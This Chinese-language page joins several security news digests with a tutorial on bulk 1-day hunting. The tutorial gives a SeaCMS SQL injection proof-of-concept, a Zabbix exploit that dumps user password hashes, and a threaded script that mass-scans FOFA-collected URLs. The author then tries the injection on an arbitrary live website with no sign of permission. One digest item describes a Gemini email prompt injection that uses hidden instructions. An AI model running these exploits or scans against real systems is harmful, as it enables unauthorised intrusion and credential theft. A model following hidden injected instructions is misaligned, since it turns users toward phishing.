1、僵尸网络BADBOX 2.0全球蔓延威胁升级 https://hackread.com/badbox-2-0-preinstalled-android-iot-devices-worldwide/ 近日，BADBOX 2.0 恶意软件在全球222个国家和地区超过100万台Android物联网设备上被发现，将设备变成欺诈和恶意活动的代理节点，被美国联邦调查局列为全球性威胁。该软件通过libanl.so后门库深嵌于固件，恢复出厂设置后仍可运行，通过隐藏广告点击活动牟利，还会在用户不知情时进行点击欺诈、凭证填充等攻击。其主要通过不受监管的供应链传播，常见于低成本智能电视、流媒体盒等设备。用户若发现设备运行缓慢、异常发热或闲置时网络流量异常，可 2、研究人员披露Windows Server 2025 dMSA漏洞 https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/ 网络安全研究人员披露了Windows Server 2025中委托托管服务帐户（dMSA）存在的严重设计缺陷。该漏洞被称为Golden dMSA攻击，攻击者可利用其绕过身份验证并为所有dMSA和组托管服务帐户（gMSA）生成密码。攻击者需先获取密钥分发服务（KDS）根密钥，再通过枚举dMSA帐户、猜测ManagedPasswordId属性并生成密码，实现跨域横向移动和持久访问。该攻击利用了密码生成结构中的可预测时间组件，仅需1024次尝试 3、联合天然食品公司网络攻击致4亿美元销售损失 https://cyberscoop.com/united-natural-foods-cyberattack-400-million/ 联合天然食品公司（United Natural Foods）上月遭遇网络攻击，导致系统瘫痪并完全关闭，造成高达4亿美元的销售额损失。该公司于6月5日发现攻击，并在四天后披露。此次攻击由经济动机的网络犯罪团伙Scattered Spider发起，该团伙自重组以来已攻击多个行业。联合天然食品公司负责向北美3万个客户地点配送产品，攻击导致其未能完成订单，商店货架空空如也。公司预计网络保险将覆盖恢复成本，但补偿可能在2026财年到来。目前，公司已基本恢复正常运营。 4、GhostContainer后门攻击亚洲Exchange服务器 https://securelist.com/ghostcontainer/116953/ 网络安全研究团队发现了一种名为GhostContainer的复杂后门恶意软件，专门针对亚洲地区高价值组织（包括政府机构和高科技公司）的Exchange服务器。该恶意软件通过已知的N-day漏洞入侵Exchange服务器，采用多种规避技术伪装成正常服务器组件，以逃避安全检测。GhostContainer具备多种功能，包括执行Shellcode、下载文件、运行命令、加载其他模块等，并可充当Web代理或隧道，将内部网络暴露于外部威胁。攻击者利用多个开源项目构建了该后门，使其能够动态扩展功能。目前，相关攻击活 5、npm代码检查包遭钓鱼攻击被植入恶意软件 https://www.bleepingcomputer.com/news/security/popular-npm-linter-packages-hijacked-via-phishing-to-drop-malware/ 流行的JavaScript代码检查工具包eslint-config-prettier和eslint-plugin-prettier被网络钓鱼攻击劫持，用于植入恶意软件。这两个包的维护者在遭受钓鱼邮件攻击后，其npm账户凭证被盗，导致攻击者发布了多个未经授权且包含恶意代码的版本。这些恶意版本在安装时会运行一个名为“install.js”的脚本，尝试在Windows系统上 6、CrushFTP零日漏洞被用于劫持服务器 https://www.bleepingcomputer.com/news/security/new-crushftp-zero-day-exploited-in-attacks-to-hijack-servers/ CrushFTP警告称，威胁行为体正在积极利用编号为CVE - 2025 - 54309的零日漏洞，该漏洞允许攻击者通过易受攻击的服务器上的Web界面获得管理访问权限。CrushFTP是一款企业级文件传输服务器，广泛用于通过FTP、SFTP、HTTP/S等协议安全共享和管理文件。该漏洞首次被发现于7月18日上午9点（CST），攻击者可能早在7月17日凌晨就开始利用该漏洞。Cru 7、中东监控公司利用SS7漏洞追踪手机位置 https://techcrunch.com/2025/07/18/a-surveillance-vendor-was-caught-exploiting-a-new-ss7-attack-to-track-peoples-phone-locations/ 安全研究人员发现中东一家监控公司利用新的攻击手段，绕过电话运营商的安全保护措施，诱骗其泄露手机用户的位置信息。SS7是全球电话运营商用于路由电话和短信的私有协议，也可用于获取用户手机连接的信号塔信息。此次攻击利用了SS7协议漏洞，可将用户定位到最近的信号塔，甚至在城市地区缩小到几百米范围内。网络安全公司早在 2024 年底就观察到此类攻击 8、英伟达漏洞致AI与机器人平台面临RCE和数据泄露风险 https://www.freebuf.com/articles/system/440351.html 英伟达已针对其Jetson Linux和IGX平台发布安全更新，修复了两个可能导致系统遭受代码执行、数据篡改、服务拒绝和信息泄露的漏洞。这两个编号为CVE-2025-23270和CVE-2025-23269的漏洞影响广泛用于人工智能、机器人和嵌入式边缘计算的Jetson Orin及Xavier系列产品。 9、首款AI驱动的恶意软件LameHug问世，与俄APT28存在关联 https://www.freebuf.com/articles/ai-security/440247.html 乌克兰计算机应急响应小组（CERT-UA）近日发出警告，发现一款名为LameHug的新型恶意软件，该软件利用大语言模型（LLM）在受感染的Windows系统上生成并执行恶意指令。乌克兰专家将其归因于与俄罗斯有关的APT28黑客组织（又名UAC-0001、Fancy Bear、Pawn Storm等）。 10、BIND 9 DNS解析软件漏洞使全球企业面临缓存投毒与DoS攻击风险 https://www.freebuf.com/articles/network/440203.html BIND 9 DNS解析软件中的两个高危漏洞正影响全球企业，可能导致缓存投毒和拒绝服务攻击。这两个编号为CVE-2025-40776和CVE-2025-40777的漏洞对DNS基础设施构成重大安全风险，特别是配置了特定高级功能的解析器。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、黑客利用微软Teams传播Matanbuchus 3.0 https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/ Matanbuchus 3.0，一种恶意软件即服务（MaaS），于 2025 年 7 月发布，引入了多种先进技术，如改进的通信协议、内存隐身功能和增强的混淆技术。该版本通过冒充 IT 服务台的 Microsoft Teams 电话诱导受害者执行恶意脚本，从而在受感染的 Windows 系统上下载并执行辅助负载。它能够收集系统数据（包括 EDR 安全控制），并根据这些数据定制后续攻击，最终可能导致勒索软件入侵。安全专家提醒，企业和用户 2、UNC6148利用后门攻击SonicWall SMA系列设备 https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor UNC6148 威胁行为体正在针对已完全修补的 SonicWall 安全移动访问（SMA）100 系列设备发起攻击活动。攻击者利用之前入侵过程中窃取的凭证和一次性密码（OTP）种子，即使在组织已应用安全更新后，也能重新获得访问权限。攻击者部署了一个名为 OVERSTEP 的后门程序，该程序能够修改设备的启动过程以维持持久访问，窃取凭证并隐藏自身组件。攻击者通 3、Cloudflare 1.1.1.1中断源于内部配置错误 https://www.bleepingcomputer.com/news/security/cloudflare-says-1111-outage-not-caused-by-attack-or-bgp-hijack/ Cloudflare于2025年7月14日发生全球性中断，影响了其1.1.1.1公共DNS解析器服务，导致许多用户无法正常使用互联网。事后分析显示，此次中断并非由网络攻击或BGP劫持引起，而是由于内部配置错误。6月6日，Cloudflare对数据本地化套件（DLS）进行了配置更改，错误地将1.1.1.1解析器IP前缀链接到非生产DLS服务。7月14日的一次更新触发了错误配置 4、NVIDIA容器工具包漏洞可导致权限提升任意代码执行 https://www.freebuf.com/articles/system/440080.html NVIDIA已发布关键安全更新，修复其容器工具包（Container Toolkit）和GPU Operator中的两个高危漏洞，攻击者可利用这些漏洞以提升的权限执行任意代码。这两个编号为CVE-2025-23266和CVE-2025-23267的漏洞，影响所有运行NVIDIA容器工具包1.17.7及以下版本和GPU Operator 25.3.0及以下版本的平台。 5、联想预装程序Vantage漏洞可用于获取SYSTEM权限 https://www.freebuf.com/articles/system/439807.html 最新披露的三个漏洞（CVE-2025-6230、CVE-2025-6231和CVE-2025-6232）表明，一个受信任的OEM工具可能成为完全控制计算机的跳板。联想Vantage预装在大多数ThinkPad和ThinkBook笔记本电脑上，其核心服务以_NT AUTHORITY\SYSTEM_权限运行，并动态加载C#插件来提供更新、硬件控制和遥测功能。由于这些插件需要通过专有的JSON-over-RPC协议与特权服务通信，输入验证或路径处理中的任何缺陷都会立即扩大本地攻击者的攻击面。 6、思科ISE曝严重漏洞，无需认证即可获取root权限 https://www.freebuf.com/articles/system/439747.html 思科身份服务引擎（Cisco Identity Services Engine，简称ISE）及其策略集成组件（ISE-PIC）中发现一个严重漏洞，编号为CVE-2025-20337。该漏洞获得CVSS最高风险评分10分，凸显其严重性和潜在影响。根据思科安全公告，该漏洞源于特定API中"对用户输入验证不足"的问题。这意味着未经身份验证的远程攻击者无需任何凭证，就能以root权限在底层操作系统上执行任意代码。 7、甲骨文发布关键安全更新：修复309个漏洞，其中145个可远程利用 https://www.freebuf.com/articles/es/439680.html 甲骨文公司于7月15日发布2025年7月关键补丁更新，为其广泛的产品组合修复了309个安全漏洞。此次季度安全更新是近年来最全面的补丁之一，针对数据库系统、中间件、云应用和企业软件中的关键缺陷，这些漏洞可能使企业面临严重的网络攻击风险。 8、专攻物理隔离！美军投资部署新型战术级网络攻击装备 https://www.secrss.com/articles/81025 美国参议院军事委员会2026年度国防政策法案要求，审查未来网络作战兵力的运用概念，以应对战术级网络作战趋势；近一年多以来，美军各军种纷纷投资部署网电融合战术装备，以针对非IP协议和网络隔离的作战目标，网络司令部也在研究如何充分利用这些装备和部队，来更好地实施网络作战任务。 9、热门健身应用Fitify数据泄露37.3 万份私密文件 https://www.secrss.com/articles/81008 健身应用 Fitify 因谷歌云存储桶配置错误导致37.3万份用户数据遭公开暴露，其中包括13.8万张用于追踪健身进度的隐私照片（部分涉及穿着较少内容）及6000份身体扫描数据，暴露原因为存储桶未设置访问权限控制。 10、黑客窃取BigONE 交易所加密货币2700万美元 https://www.bleepingcomputer.com/news/security/hacker-steals-27-million-in-bigone-exchange-crypto-breach/ 加密货币交易平台 BigONE 披露，昨日黑客在一次攻击中盗取了价值 2700 万美元的各种数字资产。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者利用HazyBeacon后门攻击东南亚政府部门 https://unit42.paloaltonetworks.com/windows-backdoor-for-novel-c2-communication/ 研究人员追踪了一个代号为CL-STA-1020的攻击活动，目标是东南亚的政府机构。攻击者开发了一个名为HazyBeacon的新型Windows后门，利用AWS Lambda URL作为命令与控制（C2）基础设施，通过合法的云服务进行隐蔽通信。攻击者通过DLL侧载技术部署后门，并利用Google Drive和Dropbox进行数据渗漏，收集与近期贸易争端相关的敏感信息。专家提醒，加强对云资源的监控和检测策略，以识别可疑的通信模式，并防 2、新兴勒索软件GLOBAL GROUP威胁全球多行业 https://blog.eclecticiq.com/global-group-emerging-ransomware-as-a-service 安全人员发现了一个名为GLOBAL GROUP的新兴勒索软件即服务（RaaS）品牌，该组织由代号为“$$”的威胁行为者在Ramp4u论坛上推广。GLOBAL GROUP的目标客户主要包括美国和欧洲的多个行业，尤其在医疗保健和工业领域。该组织可能是Black Lock RaaS品牌的重塑，旨在重建信誉并扩大其联盟网络。GLOBAL GROUP通过Tor网络运营专用泄密网站，并声称已有17名受害者，其中大多数来自医疗行业。该组织利用初始访问代理（I 3、恶意软件Konfety变种采用新型规避技术 https://zimperium.com/blog/konfety-returns-classic-mobile-threat-with-new-evasion-techniques 知名恶意软件Konfety的新型变种再次出现，以安卓系统为目标，采用多种复杂技术进行欺诈活动。该恶意软件通过“邪恶双胞胎”方法，即在官方商店发布良性应用，同时通过第三方渠道分发恶意版本，两者共享相同软件包名称，以增强其规避能力和影响力。此外，该恶意软件还采用ZIP级别逃避技术，篡改APK结构，破坏分析工具；利用动态代码加载隐藏关键功能；采用隐身技术隐藏图标，模仿合法应用；并利用CaramelAds SDK进行 4、技嘉主板UEFI漏洞可被恶意软件攻击 https://www.bleepingcomputer.com/news/security/gigabyte-motherboards-vulnerable-to-uefi-malware-bypassing-secure-boot/ 安全研究人员发现技嘉主板存在严重漏洞，其UEFI固件可被恶意软件攻击。这些漏洞允许攻击者在系统管理模式下执行任意代码，绕过安全启动功能，植入持久性恶意软件。研究人员共发现四个漏洞（CVE-2025-7026至CVE-2025-7029），均被评为高危级别。受影响主板型号超过240种，涉及多个产品线。固件供应商AMI已修复漏洞，但技嘉尚未发布修复程序。许多受影 5、7.3Tbps最大规模DDoS攻击创纪录 https://cybersecuritynews.com/record-breaking-ddos-attack-7-3-tbps/ 2025年DDoS攻击规模创新高，Cloudflare成功抵御7.3Tbps破纪录攻击，电信行业成主要目标。攻击复杂度和频率激增，自动化防御成关键，网络安全需董事会级重视。 6、Node.js漏洞威胁数百万Windows应用 https://securityonline.info/high-severity-node-js-flaws-expose-windows-apps-to-path-traversal-cve-2025-27210-hashdos-cve-2025-27209-attacks/ OpenJS基金会紧急修复Node.js高危漏洞CVE-2025-27210（Windows路径穿越）和CVE-2025-27209（V8引擎HashDoS），影响全球数百万应用，已发布20.19.4、22.17.1和24.4.1修复版本。 7、 Apache CXF 漏洞拒绝服务与数据泄露双重风险 https://securityonline.info/apache-cxf-vulnerability-dos-and-data-leak-risks-exposed-cve-2025-48795/ Apache CXF曝高危漏洞（CVE-2025-48795），影响3.5.10-4.1.0版本，可能导致DoS攻击和敏感数据泄露。攻击者可利用内存耗尽或窃取日志中的明文凭证。建议立即升级至修复版本3.5.11/3.6.6/4.0.7/4.1.1。 8、三星WLAN无线接入点曝高危漏洞可获取Root权限 https://securityonline.info/critical-pre-auth-root-rce-found-in-samsung-wlan-aps-poc-published-patch-now/ 三星WLAN AP曝高危漏洞，攻击者可远程获取root权限执行任意代码，无需认证。厂商已发布补丁，建议立即检查设备并更新，或配置ACL临时防护。 9、欧洲警方协调全球行动捣毁亲俄网络犯罪团伙 https://www.securityweek.com/europol-coordinated-global-operation-takes-down-pro-russian-cybercrime-network/ 欧洲刑警组织周三宣布，一场协调国际行动已打击与针对乌克兰及其盟友的一系列拒绝服务攻击有关的亲俄网络犯罪团伙的基础设施。 10、SonicWall 设备受到新型“Overstep”恶意软件攻击 https://www.securityweek.com/sonicwall-sma-appliances-targeted-with-new-overstep-malware/ 谷歌的威胁情报小组在周三警告一个可能出于经济动机的威胁行为者正在利用一种新的恶意软件攻击 SonicWall 设备。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、勒索软件新变种Interlock RAT利用FileFix进行攻击 https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/ 2、PHP恶意软件利用ZIP文件重定向WordPress访问者 https://blog.sucuri.net/2025/07/stealthy-php-malware-uses-zip-archive-to-redirect-wordpress-visitors.html 研究人员发现一种复杂的PHP恶意软件，通过ZIP压缩包隐藏恶意代码，重定向WordPress网站访问者，同时进行SEO投毒和未经授权的内容注入。该恶意软件嵌入WordPress核心文件wp-settings.php，通过zip://封装器从win.zip中加载与主机名匹配的文件。其功能包括动态选择命令与控制（C2）服务器、反机器人机制、远程内容获取、操纵SEO文件（如robots.t 3、Gemini邮件摘要功出现网络钓鱼漏洞 https://0din.ai/blog/phishing-for-gemini 研究人员向0DIN提交报告，披露Google Gemini for Workspace存在提示注入漏洞。攻击者可在电子邮件中嵌入隐藏指令，当收件人点击“摘要此邮件”时，Gemini会将隐藏指令作为摘要的一部分显示，诱导用户采取行动（如拨打电话或访问网站），从而实现凭证盗窃或社会工程攻击。该漏洞利用HTML/CSS隐藏文本，绕过垃圾邮件过滤器和模型防护机制。 4、20年历史漏洞可让黑客远程控制列车制动系统 https://cybersecuritynews.com/hackers-control-train-brakes/ 美国CISA警告铁路通信系统高危漏洞（CVE-2025-1727），攻击者可远程控制列车制动，导致急停或故障。漏洞源于BCH校验认证薄弱，需网络隔离、防火墙等缓解措施。目前无公开利用案例，但风险严重。 5、Git仓库成为敏感数据泄露隐秘通道 https://thehackernews.com/2025/07/the-unusual-suspect-git-repos.html 安全研究机构披露，被忽视的Git存储库正成为攻击者侵入企业核心的“影子通道”。过去一年，GitHub平台泄露的API密钥、云凭证等机密信息达3900万条，同比增长67%。攻击者借助开源扫描工具，先从公共或配置错误的仓库提取密钥，随后横向渗透云环境、CI/CD管道及内部网络，甚至可在无告警情况下完成持久化驻留。NIS2、SOC2等合规框架已将Git安全列为必审项。专家建议：把机密迁入专用管理器，在CI流程中嵌入安全扫描，严格最小权限与短期令牌策略，并持续验证 6、流行自托管照片平台Immich曝OAuth2账户劫持漏洞 https://securityonline.info/cve-2025-43856-oauth2-account-hijacking-flaw-found-in-immich-a-popular-self-hosted-photo-platform/ Immich自托管照片平台曝高危漏洞CVE-2025-43856（CVSSv4 8.8），OAuth2未验证state参数致账户劫持风险，攻击者可绑定受害者账户窃取数据。影响v1.132.0前所有版本，已修复。 7、BlackSuit：Royal/Conti改头换面重出江湖 https://securityonline.info/blacksuit-new-royal-conti-rebrand-hits-with-speed-stealth-data-exfiltration/ BlackSuit勒索组织（Royal/Conti重组）实施2023年最复杂攻击：三阶段杀伤链（入侵、窃密、加密）结合Cobalt Strike工具，通过横向移动技术保持隐蔽，采用双重勒索策略并破坏恢复，加密逻辑精心优化。 8、Fortinet FortiWeb 存在SQL注入漏洞 https://www.secrss.com/articles/80858 近日，官方修复Fortinet FortiWeb SQL注入漏洞(CVE-2025-25257)，该漏洞源于Fortinet FortiWeb Fabric Connector 组件在认证处理中没有严格校验输入参数，攻击者可在 Authorization: Bearer 头中注入恶意SQL语句，实现远程代码执行获取服务器权限。目前该漏洞技术细节与POC已在互联网上公开，建议客户尽快做好自查及防护。 9、LaRecipe 存在严重 SSTI 漏洞，影响数百万Laravel应用 https://www.anquanke.com/post/id/310091 一项新发现的服务器端模板注入（SSTI）漏洞已被分配为 CVE-2025-53833，并获得了 CVSS 满分 10.0 的评级，意味着该漏洞风险极高。该漏洞存在于广泛使用的 LaRecipe 文档工具中，可能导致远程代码执行（RCE），使攻击者能够完全控制运行受影响版本 LaRecipe 的服务器。 10、红牛招聘骗局曝光：网络钓鱼活动冒充知名品牌窃取凭证 https://www.anquanke.com/post/id/309991 Evalian安全运营中心（SOC）近日揭露了一起具有高度迷惑性和隐蔽性的钓鱼活动。该活动借助合法服务、伪造知名品牌，以“红牛招聘”为幌子，绕过自动化安全系统，成功潜入受害者邮箱。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 最近在学习 SRC 的挖掘，常规的 SRC 挖掘就是信息泄露，什么逻辑漏洞什么的，什么越权漏洞，但是说实话，挖掘起来不仅需要很多时间，而且还需要很多经验，当然其实还有一种挖掘的办法，就是利用刚出的 1day 去批量扫描，如果自己会代码审计的话，就再好不过了，下面给大家分享分享整个过程是怎么样的。 工具介绍 项目地址 https://github.com/W01fh4cker/Serein【懒人神器】一款图形化、批量采集 url、批量对采集的 url 进行各种 nday 检测的工具。可用于 src 挖掘、cnvd 挖掘、0day 利用、打造自己的武器库等场景。可以批量利用 Actively Exploited Atlassian Confluence 0Day CVE-2022-26134 和 DedeCMS v5.7.87 SQL 注入 CVE-2022-23337。 具体使用方法下面会介绍 漏洞样本 本次选取的是一个前些天看到的 seacms 的一个 sql 注入，当时也是自己也审计了一波的 这里给出审计的过程 /js/player/dmplayer/dmku/index.php 未授权 sql 注入 这个相比于上一个来说是危害更大，因为不需要登录 admin 用户 确实是 sleep 了，说明漏洞存在，我们看到代码 if ($_GET['ac'] == "edit") {    $cid = $_POST['cid'] ?: showmessage(-1, null);    $data = $d->编辑弹幕($cid) ?:  succeedmsg(0, '完成');    exit; } 我们跟进编辑弹幕方法 一路来到 public static function 编辑_弹幕($cid)   {        try {            global $_config;            $text = $_POST['text'];            $color = $_POST['color'];            $conn = @new mysqli($_config['数据库']['地址'], $_config['数据库']['用户名'], $_config['数据库']['密码'], $_config['数据库']['名称'], $_config['数据库']['端口']);                        $sql = "UPDATE sea_danmaku_list SET text='$text',color='$color' WHERE cid=$cid";            $result = "UPDATE sea_danmaku_report SET text='$text',color='$color' WHERE cid=$cid";            $conn->query($sql);            $conn->query($result);       } catch (PDOException $e) {            showmessage(-1, '数据库错误:' . $e->getMessage());       }   } 这里我们可以看到查询又是使用的原生的 query 方法，所以并没有过滤 所以导致 sql 注入 还有我们看到当 ac=del，type=list 的时候 else if ($_GET['ac'] == "del") {        $id = $_GET['id'] ?: succeedmsg(-1, null);        $type = $_GET['type'] ?: succeedmsg(-1, null);        $data = $d->删除弹幕($id) ?: succeedmsg(0, []);        succeedmsg(23, true); 进入删除弹幕($id) public function 删除弹幕($id)   {        //sql::插入_弹幕($data);        sql::删除_弹幕数据($id);   } 进入 sql::删除_弹幕数据($id); public static function 删除_弹幕数据($id)   {        try {            global $_config;            $conn = @new mysqli($_config['数据库']['地址'], $_config['数据库']['用户名'], $_config['数据库']['密码'], $_config['数据库']['名称'], $_config['数据库']['端口']);            $conn->set_charset('utf8');            if ($_GET['type'] == "list") {                $sql = "DELETE FROM sea_danmaku_report WHERE cid={$id}";                $result = "DELETE FROM sea_danmaku_list WHERE cid={$id}";                $conn->query($sql);                $conn->query($result);           } else if ($_GET['type'] == "report") {                $sql = "DELETE FROM sea_danmaku_report WHERE cid={$id}";                $conn->query($sql);           }       } catch (PDOException $e) {            showmessage(-1, '数据库错误:' . $e->getMessage());       }   } 我们的 id 是可以控制的，type 也是可以控制的，而且没有任何的过滤，当 type=list 的时候，直接放进 query 函数进行查询 漏洞验证 POC GET /js/player/dmplayer/dmku/index.php?ac=del&id=(select(1)from(select(sleep(6)))x)&type=list HTTP/1.1 Host: seacms:8181 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://seacms:8181/js/player/dmplayer/dmku/index.php?ac=del&id=(select(1)from(select(sleep(0)))x)&type=list Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=5dl35hp50uj606p52se8kg91a2; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; XDEBUG_SESSION=PHPSTORM Connection: keep-alive 效果如图，可以发现确实延迟了 6 秒 工具利用过程 首先就是看工具的逻辑是如何添加漏洞的 首先看主文件 代码很长，说一下我们需要注意的点，首先就是配置,对于的 fofa 配置如下 需要你进入工具的时候配置邮箱和 key def fofa_saveit_first():    email = fofa_text1.get()    key = fofa_text2.get()    with open("fofa配置.conf","a+") as f:        f.write(f"[data]\nemail={email}\nkey={key}")        f.close()    showinfo("保存成功！","请继续使用fofa搜索模块！下一次将自动读取，不再需要配置！")    text3.insert(END,f"【+】保存成功！请继续使用fofa搜索模块！下一次将会自动读取，不再需要配置！您的email是：{email}；为保护您的隐私，api-key不会显示。\n")    text3.see(END)    fofa_info.destroy() def fofa_saveit_twice():    global email_r,key_r    if not os.path.exists("fofa配置.conf"):        fofa_saveit_first()    else:        email_r = getFofaConfig("data", "email")        key_r = getFofaConfig("data", "key") def fofa_info():    global fofa_info,fofa_text1,fofa_text2,fofa_text3    fofa_info = tk.Tk()    fofa_info.title("fofa配置")    fofa_info.geometry('230x100')    fofa_info.resizable(0, 0)    fofa_info.iconbitmap('logo.ico')    fofa_email = tk.StringVar(fofa_info,value="填注册fofa的email")    fofa_text1 = ttk.Entry(fofa_info, bootstyle="success", width=30, textvariable=fofa_email)    fofa_text1.grid(row=0, column=1, padx=5, pady=5)    fofa_key = tk.StringVar(fofa_info,value="填email对应的key")    fofa_text2 = ttk.Entry(fofa_info, bootstyle="success", width=30, textvariable=fofa_key)    fofa_text2.grid(row=1, column=1, padx=5, pady=5)    button1 = ttk.Button(fofa_info, text="点击保存", command=fofa_saveit_twice, width=30, bootstyle="info")    button1.grid(row=2, column=1, padx=5, pady=5)    fofa_info.mainloop() 使用 fofa 的处理流程 后续是通过 fofa 的 api 进行查询的，所以需要你的 api，只有 vip 才有这个功能 然后下面是脚本调用逻辑 因为一个漏洞是需要你自己写一个 python 脚本的 然后加入你自己自定义的漏洞是在 这个逻辑应该很好理解，比如我的就是 button50 = ttk.Button(group3,text="seacms前台sql注入",command=sql_injection_gui,width=45,bootstyle="primary") button50.grid(row=15,column=2,columnspan=2,padx=5,pady=5) 然后就是写对应的利用脚本了 因为我们写的脚本是需要贴合工具的，所以先随便找一个脚本看看大概的架构是怎么样的 工具自带了许许多多的利用脚本，我们看一下如何仿写 比如 zabbix_sql.py import requests import tkinter as tk from tkinter import scrolledtext from concurrent.futures import ThreadPoolExecutor from ttkbootstrap.constants import * """ Zabbix ‘popup.php’SQL注入漏洞 http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201112-017 Zabbix的popup.php中存在SQL注入漏洞。远程攻击者可借助only_hostid参数执行任意SQL命令。 """ def zabbix_sql_exp(url):    poc = r"""popup.php?dstfrm=form_scenario&dstfld1=application&srctbl=applications&srcfld1=name&only_hostid=1))%20union%20select%201,group_concat(surname,0x2f,passwd)%20from%20users%23"""    target_url = url + poc    status_str = ['Administrator', 'User']    try:        res = requests.get(url, Verify=False,timeout=3)        if res.status_code == 200:            target_url_payload = f"{target_url}"            res = requests.get(url=target_url_payload,Verify=False)            if res.status_code == 200:                for i in range(len(status_str)):                    if status_str[i] in res.text:                        zabbix_sql.insert(END,"【*】存在漏洞的url：" + url + "\n")                        zabbix_sql.see(END)                        with open ("存在Zabbix—SQL注入漏洞的url.txt", 'a') as f:                            f.write(url + "\n")            else:                target_url = url + '/zabbix/' + poc                res = requests.get(url=target_url,verify=False)                for i in range(len(status_str)):                    if status_str[i] in res.text:                        zabbix_sql.insert(END, "【*】存在漏洞的url：" + url + "\n")                        zabbix_sql.see(END)                        with open("存在Zabbix—SQL注入漏洞的url.txt", 'a') as f:                            f.write(url + "\n")        else:            zabbix_sql.insert(END, "【×】不存在漏洞的url：" + url + "\n")            zabbix_sql.see(END)    except Exception as err:        zabbix_sql.insert(END, "【×】目标请求失败，报错内容：" + str(err) + "\n")        zabbix_sql.see(END) def get_zabbix_addr():    with open("url.txt","r") as f:        for address in f.readlines():            address = address.strip()            yield address def zabbix_sql_gui():    zabbix_sql_poc = tk.Tk()    zabbix_sql_poc.geometry("910x450")    zabbix_sql_poc.title("Zabbix—SQL注入 漏洞一把梭")    zabbix_sql_poc.resizable(0, 0)    zabbix_sql_poc.iconbitmap('logo.ico')    global zabbix_sql    zabbix_sql = scrolledtext.ScrolledText(zabbix_sql_poc,width=123, height=25)    zabbix_sql.grid(row=0, column=0, padx=10, pady=10)    zabbix_sql.see(END)    addrs = get_zabbix_addr()    max_thread_num = 30    executor = ThreadPoolExecutor(max_workers=max_thread_num)    for addr in addrs:        future = executor.submit(zabbix_sql_exp, addr)    zabbix_sql_poc.mainloop() 大概的架构就是访问地址，发送 paylaod，然后对应利用成功和失败的特征进行鉴定，然后就是最后的 gui 模块 因此我们可以对应的写出一个脚本，我按照我的漏洞写出的脚本如下 import requests import time import tkinter as tk from tkinter import scrolledtext from concurrent.futures import ThreadPoolExecutor from ttkbootstrap.constants import * # 执行SQL注入检测的函数 def sql_injection_exp(url):    target = url + "/js/player/dmplayer/dmku/index.php?ac=edit"    data = {        "cid": "(select(1)from(select(sleep(6)))x)",        "text": "1",        "color": "1"   }    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",        "Content-Type": "application/x-www-form-urlencoded"   }    start_time = time.time()    try:        response = requests.post(target, data=data, headers=headers, timeout=10)        elapsed_time = time.time() - start_time        if elapsed_time > 5:            output_text.insert(END, f"【*】找到SQL注入在 {target} (响应时间: {elapsed_time:.2f} 秒)\n")            output_text.see(END)            with open("找到sql注入的url.txt", 'a') as f:                f.write(url + "\n")        else:            output_text.insert(END, f"【×】没有SQL注入在 {target} (响应时间: {elapsed_time:.2f} 秒)\n")            output_text.see(END)    except requests.exceptions.RequestException as err:        output_text.insert(END, f"【×】目标请求失败：{target}，错误内容：{err}\n")        output_text.see(END) # 获取URL地址的生成器 def get_urls():    with open('url.txt', 'r') as file:        for line in file.readlines():            yield line.strip() # GUI界面 def sql_injection_gui():    root = tk.Tk()    root.geometry("910x450")    root.title("seacms前台sql注入")    root.resizable(0, 0)    global output_text    output_text = scrolledtext.ScrolledText(root, width=123, height=25)    output_text.grid(row=0, column=0, padx=10, pady=10)    urls = get_urls()    max_threads = 30  # 并发线程数    executor = ThreadPoolExecutor(max_workers=max_threads)    for url in urls:        future = executor.submit(sql_injection_exp, url)    root.mainloop() 然后添加好模块 可以看见是添加成功了的 实战演示 首先就是搜集 url 了，配置好了之后只需要 因为我没有 fofa 的会员，这里使用自己搜集的 url，放在一个文件里面的，如果有的话就不需要我这样操作了 然后来到你需要利用的板块 利用的效果 然后我们可以随便找个网址验证一下 进入网址效果如下，说明网址还在正常使用的 然后测试漏洞 可以看见漏洞是存在的 然后就是查权重了 这个可以一把梭哈的

